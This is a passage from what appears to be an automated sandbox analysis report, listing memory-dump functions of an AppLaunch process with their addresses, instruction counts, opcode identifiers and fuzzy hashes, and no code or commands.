                                                                                                                                    Function 0564D440, Relevance: .2, Instructions: 191COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b6150af2244f15ba2a7be5d39d5e4a77c8426a13ea86a1cc14f3b04bbc953b0b
                                                                                                                                    • Instruction ID: 01337bfd0fa558d225fbf4683d738f41f314aa3b53aba644214a2c61c71f9ca2
                                                                                                                                    • Opcode Fuzzy Hash: b6150af2244f15ba2a7be5d39d5e4a77c8426a13ea86a1cc14f3b04bbc953b0b
                                                                                                                                    • Instruction Fuzzy Hash: 3B715B75F002198FCB14DFA9C4546AEBBF3AF89304F208529D906AB790DB749D46CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564E388, Relevance: .2, Instructions: 188COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e79ae42af7ad67840e7e161ffc498974581b3e667158b8805350a07d298c4555
                                                                                                                                    • Instruction ID: 9c780c517261fd31e2021212e15292873e71d162f4055570476b7634e5015d4d
                                                                                                                                    • Opcode Fuzzy Hash: e79ae42af7ad67840e7e161ffc498974581b3e667158b8805350a07d298c4555
                                                                                                                                    • Instruction Fuzzy Hash: 4B811A38A00209DFCB18DF64D59899EBBB6FF88311F158558E906AB760DB31EC41CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564D228, Relevance: .2, Instructions: 153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 65599ba75510ee0d9013051a830c8608a2346d94c0175883fbc841779c866faa
                                                                                                                                    • Instruction ID: 09d234ed3f23b78a43b98da37acc19d23e9d87ef32b167c7bf9424a68411ea72
                                                                                                                                    • Opcode Fuzzy Hash: 65599ba75510ee0d9013051a830c8608a2346d94c0175883fbc841779c866faa
                                                                                                                                    • Instruction Fuzzy Hash: BF51D834E10219AFCB15DFA4E8949ADBBB6FF89304F154129EA12AB350DB30AD41CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564E759, Relevance: .1, Instructions: 140COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 906c8f2b06c0bc1931cfb3f82e32e1164c9e5283c41ef8cea865cadc66173ebf
                                                                                                                                    • Instruction ID: e4d64cfc5657466c501391f30cad7d567bb07ee9c81f8bdaf1e5422d03b3ab7c
                                                                                                                                    • Opcode Fuzzy Hash: 906c8f2b06c0bc1931cfb3f82e32e1164c9e5283c41ef8cea865cadc66173ebf
                                                                                                                                    • Instruction Fuzzy Hash: 1951C738A00209DFCB18DFA4D598AADBBB6FF88310F158554E916AB761DB32EC41CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05642A79, Relevance: .1, Instructions: 137COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cd06abd369ce3804d2a0162917068c53a0faf260b0b32fd462b474f031d09aa9
                                                                                                                                    • Instruction ID: b7713aedca8ed08a3a068c6d7e95d780dc47e82985bc218030c3530dfba60268
                                                                                                                                    • Opcode Fuzzy Hash: cd06abd369ce3804d2a0162917068c53a0faf260b0b32fd462b474f031d09aa9
                                                                                                                                    • Instruction Fuzzy Hash: 5741CE307105098BCB14FBB8D45806DBBB2FFCA310F544A59E5629B2D4EF349949CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05642A88, Relevance: .1, Instructions: 130COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 29ecc52c5dd378185c2dcbf4726170cd32076267ab638b23d84c2fb60a98da39
                                                                                                                                    • Instruction ID: 03260ffbae12d26e0f0d823edc208c8a6e88aff5a0a5acc7a3f29271146a4545
                                                                                                                                    • Opcode Fuzzy Hash: 29ecc52c5dd378185c2dcbf4726170cd32076267ab638b23d84c2fb60a98da39
                                                                                                                                    • Instruction Fuzzy Hash: 7D41CF307105098BCB14FBB8D45906DBBB3FFC9210F544A58E562AB3D4EF34A9498BA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564D720, Relevance: .1, Instructions: 109COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 722d6d78483480ea53d33d54dfc450fa9026d25846649a841e9bce37a64eb664
                                                                                                                                    • Instruction ID: 51325d840f016100831b2203d398c8e07d9e0a2e36d6b4efcb54a7dd43f64949
                                                                                                                                    • Opcode Fuzzy Hash: 722d6d78483480ea53d33d54dfc450fa9026d25846649a841e9bce37a64eb664
                                                                                                                                    • Instruction Fuzzy Hash: 3831FE35F042048FC708DB69D46876EB7B6EF85310F2480AAD90ADB791DB319C42CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056423D9, Relevance: .1, Instructions: 108COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7b569c27e62df86e807ac114fd26675a2045f739ec975a311eb445b6f7d888a9
                                                                                                                                    • Instruction ID: 2bf8013ee2348f57492c70ed64b22d6d817019b4d25cd9e854a7c45a56db8045
                                                                                                                                    • Opcode Fuzzy Hash: 7b569c27e62df86e807ac114fd26675a2045f739ec975a311eb445b6f7d888a9
                                                                                                                                    • Instruction Fuzzy Hash: 10317E74B0111A9FCB58EB74E45896EBBE7EF88200714896DDA06D7344DF388D068FA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05647E81, Relevance: .1, Instructions: 103COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2c61aaee3dce75832f07000c0752942a4f7746e416d155ca335519a31cb51117
                                                                                                                                    • Instruction ID: 9e3abe80c5eb3e61615d198953134607e2ead97adc900123ad9439ecd3c7f077
                                                                                                                                    • Opcode Fuzzy Hash: 2c61aaee3dce75832f07000c0752942a4f7746e416d155ca335519a31cb51117
                                                                                                                                    • Instruction Fuzzy Hash: F43102347093656FC715A734A82547E3BE79FC61113158CAAE606CB7A1EF388C068BB3
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056472F0, Relevance: .1, Instructions: 102COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 42910d69948190f47acdba6c7f678f3a74431ff1bbe5a4f176c3cd64f23cc2f6
                                                                                                                                    • Instruction ID: ec54ddf925b135849b45887378988539491f6bbcb75e5c4c29ff796307f2c1b7
                                                                                                                                    • Opcode Fuzzy Hash: 42910d69948190f47acdba6c7f678f3a74431ff1bbe5a4f176c3cd64f23cc2f6
                                                                                                                                    • Instruction Fuzzy Hash: C6312B3570A32A9FC7265778E8184AF3BBBDB8A151315486AE506CB394DF384C068FF1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05647D38, Relevance: .1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6a6bf8cb75e30d14e6f28aa3bd3e7c477c34b62335cdc6bcb920a9c9561d3e9f
                                                                                                                                    • Instruction ID: 90b80765b735bee3c9680ab95775d5035a59a04e5ebbd417bfcaf900e35b1e86
                                                                                                                                    • Opcode Fuzzy Hash: 6a6bf8cb75e30d14e6f28aa3bd3e7c477c34b62335cdc6bcb920a9c9561d3e9f
                                                                                                                                    • Instruction Fuzzy Hash: D1312C35B042098FD718DF68D4A8A6A7BF6EF89710F154068EA079B7A0CF759C41CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05640AE8, Relevance: .1, Instructions: 93COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a1a08a5e374aeb6adac468445061a31f0f3deee66b9ef51e0a5c4f93f1f6c7ce
                                                                                                                                    • Instruction ID: 4ab2b2cb7695fe4b2941aefd8a50876dd2d2386c954a2c0c61fe7d3219da7b79
                                                                                                                                    • Opcode Fuzzy Hash: a1a08a5e374aeb6adac468445061a31f0f3deee66b9ef51e0a5c4f93f1f6c7ce
                                                                                                                                    • Instruction Fuzzy Hash: 8031B070B041259FC704CB68C959A6EBBF2FF85314B1185AAE606DF3A1DB30EC42CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056450FF, Relevance: .1, Instructions: 91COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ce1bafcc56939d34007b663ff7c1d986e0972aebffa9612c2d2632b821acff43
                                                                                                                                    • Instruction ID: 53f6800751a78d11b4f2cfe37849394772d4fc610ed428f1b6e119f489dcd2cf
                                                                                                                                    • Opcode Fuzzy Hash: ce1bafcc56939d34007b663ff7c1d986e0972aebffa9612c2d2632b821acff43
                                                                                                                                    • Instruction Fuzzy Hash: E541383490420AEFCF01DFA4EA598ADBFB2FF88300B108855E601A7321DB3A5955DF62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564B0C0, Relevance: .1, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b0aaa3377545422111513212e7fc256425f6ea665d18ca9b582b8f12e32637e5
                                                                                                                                    • Instruction ID: 1275e49cef266f05d31e089a0dcb6065803cb9547b183383584736f6cedc8379
                                                                                                                                    • Opcode Fuzzy Hash: b0aaa3377545422111513212e7fc256425f6ea665d18ca9b582b8f12e32637e5
                                                                                                                                    • Instruction Fuzzy Hash: 2B319931E2074A9ACB11AFB8C8112D9F771BF99324F25872AE55977640EB30B5D4CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056483A8, Relevance: .1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 65a9d5cd1326c92a90ae66f93aefa81321b5fe3a9bcf5de060ceda4824fe3cd1
                                                                                                                                    • Instruction ID: ddf48fb5e976a5e1d96ef0ef9afc4f643f72e69f5695c8176651bf54ed22897d
                                                                                                                                    • Opcode Fuzzy Hash: 65a9d5cd1326c92a90ae66f93aefa81321b5fe3a9bcf5de060ceda4824fe3cd1
                                                                                                                                    • Instruction Fuzzy Hash: 3D31E430E1070ACBCB11EF75D8142AEB7B6FF86304B10862AD556B7740EB34B945CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05647D28, Relevance: .1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 382a5948b5ae6d206d0e4be5a542beaef940f2b17048075d3ad303e2eaf7f828
                                                                                                                                    • Instruction ID: 29299c5258b8b44df5396164bae3b2913e667d44192d03f26c82f124f624534d
                                                                                                                                    • Opcode Fuzzy Hash: 382a5948b5ae6d206d0e4be5a542beaef940f2b17048075d3ad303e2eaf7f828
                                                                                                                                    • Instruction Fuzzy Hash: C8315A34B042099FD718DF69D498AAA7BF6FF88700F144068E607AB360CB31AD42CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564B0D0, Relevance: .1, Instructions: 85COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ee763e6bf6e3ebe2ed5011f99ed2906bbe7e502725d13efeb0164c2e6c6342b1
                                                                                                                                    • Instruction ID: 3675aacda0a1bc93b2458a4e84b867c8abf5deb0bc03bfd5a0d20e1bfef46092
                                                                                                                                    • Opcode Fuzzy Hash: ee763e6bf6e3ebe2ed5011f99ed2906bbe7e502725d13efeb0164c2e6c6342b1
                                                                                                                                    • Instruction Fuzzy Hash: 54316931E10B0A9ACB10EFB8C8012D9F371BF99324F258719E55977640EB70B5D5CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05645110, Relevance: .1, Instructions: 83COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3cd428b09495f936e0170fc2bf5aa619a3f8c0d15217c4cccc8d90f3dc58ee2e
                                                                                                                                    • Instruction ID: d0968b9ad8d5189168065f60af6c276bb3d9cc83d891f7fdf2cb4bea92f7f026
                                                                                                                                    • Opcode Fuzzy Hash: 3cd428b09495f936e0170fc2bf5aa619a3f8c0d15217c4cccc8d90f3dc58ee2e
                                                                                                                                    • Instruction Fuzzy Hash: A031F63590410EEFDF41DFA4EA498ADBFB2FF88300B508815E601A7321DB3A6955DF52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056483B8, Relevance: .1, Instructions: 80COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d48d85d13c42c156baa85f71f9285f3bd583cc2e31b1d6a83dc5596ce732134e
                                                                                                                                    • Instruction ID: e59ff66378565ddee965c4f54cb528a25542d01a8d5f0aa4219ba49f8bc2cbb0
                                                                                                                                    • Opcode Fuzzy Hash: d48d85d13c42c156baa85f71f9285f3bd583cc2e31b1d6a83dc5596ce732134e
                                                                                                                                    • Instruction Fuzzy Hash: 7C31B431E1070ACBCB11EFB9D4142AEB3B6FF95304B108629C656A7740EF35B945CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564F110, Relevance: .1, Instructions: 80COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 526042fe63368e4c356b71f736e77eeca0971ab1bfce858929f97a1900d3592b
                                                                                                                                    • Instruction ID: f948e8123a28fa3bda73d4e26787a167ca48a8f8ca9d050e87af2f5697140113
                                                                                                                                    • Opcode Fuzzy Hash: 526042fe63368e4c356b71f736e77eeca0971ab1bfce858929f97a1900d3592b
                                                                                                                                    • Instruction Fuzzy Hash: BD216234A0060ADFDB14DF64C8949AABBB5FF44350F158069E9068B761DB30ED41CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05645F58, Relevance: .1, Instructions: 79COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f2a87b0bbc19ef44c325acecb0620f4174631572011451fd16154dc0f24ef7af
                                                                                                                                    • Instruction ID: c372ba08edd8b03cca5fb98a8e85f58fcea9504a02adab96d9c75df610c11666
                                                                                                                                    • Opcode Fuzzy Hash: f2a87b0bbc19ef44c325acecb0620f4174631572011451fd16154dc0f24ef7af
                                                                                                                                    • Instruction Fuzzy Hash: 932134727052155FC7209B79D804A6A7FA7AF85600B1484BAE10ACB740DF38EC41CFA3
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056452F0, Relevance: .1, Instructions: 76COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8ca9d8d18a95ad363a8e56f0864735bb4e01a54a041f523c37446afbaa117c43
                                                                                                                                    • Instruction ID: 5302c767ce09608379861e49fb81a0774bf5935da3599735567a5876387b0936
                                                                                                                                    • Opcode Fuzzy Hash: 8ca9d8d18a95ad363a8e56f0864735bb4e01a54a041f523c37446afbaa117c43
                                                                                                                                    • Instruction Fuzzy Hash: 1421D33030874A5BCB11DF24D85188F7BB6AFC1218B558E6DE1498F6A1DB70AD09C7E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0522D4DC, Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733259908.000000000522D000.00000040.00000001.sdmp, Offset: 0522D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_522d000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d394ba974e9c5280d6a011ad87f94fc5a191bc567fefcc66f5a2aa1a181c1b01
                                                                                                                                    • Instruction ID: 86e34271877d0d6be5ea94711c213761e2c68696c07ae65905d6bbaed1d24106
                                                                                                                                    • Opcode Fuzzy Hash: d394ba974e9c5280d6a011ad87f94fc5a191bc567fefcc66f5a2aa1a181c1b01
                                                                                                                                    • Instruction Fuzzy Hash: D921D679514244EFDB05DF10D9C0F26BF66FF88328F24856DE9094B246C3B6D866C6A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564B478, Relevance: .1, Instructions: 74COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 169a93ae10108a9ea3ecebd8311da1f85119c3fc1aa1abd2c364b30793115188
                                                                                                                                    • Instruction ID: 6c0977da16295a86caec24973a8bc31e0d08509d3f2eb31be54e9a46e7d265eb
                                                                                                                                    • Opcode Fuzzy Hash: 169a93ae10108a9ea3ecebd8311da1f85119c3fc1aa1abd2c364b30793115188
                                                                                                                                    • Instruction Fuzzy Hash: D6218E3170829A8BCB2D9B34E42A3393AA7AB41305B04416DE74786B91DE29CC42CF56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05640ADB, Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 27256ec8bf35eea5eca69f197970c0d7cfc7efb2f0ea1a94d1ff03fbe49c6bc7
                                                                                                                                    • Instruction ID: 4a603919a9be220da74612e264966165677ec9853284d9dbfe28f5f76cc7ea9b
                                                                                                                                    • Opcode Fuzzy Hash: 27256ec8bf35eea5eca69f197970c0d7cfc7efb2f0ea1a94d1ff03fbe49c6bc7
                                                                                                                                    • Instruction Fuzzy Hash: 99216070A002259FCB04DB69C949A7EBBF6FF84314F118469E605AF3A0DB31EC41CB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0534D5A4, Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733366260.000000000534D000.00000040.00000001.sdmp, Offset: 0534D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_534d000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5329c1e359ce81627241bc99e1ac147729f55f8fbb6324b40ad72f0f3e63cdbc
                                                                                                                                    • Instruction ID: c039eb3b801449cdebe19d6c895f8d8618a343798dde34a101d773462660f155
                                                                                                                                    • Opcode Fuzzy Hash: 5329c1e359ce81627241bc99e1ac147729f55f8fbb6324b40ad72f0f3e63cdbc
                                                                                                                                    • Instruction Fuzzy Hash: 1521D3B1604244DFDB00CF14D5C0F26BBE6FB84218F24C9A9D9094F645C77AE846CE61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0534D3F4, Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733366260.000000000534D000.00000040.00000001.sdmp, Offset: 0534D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_534d000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
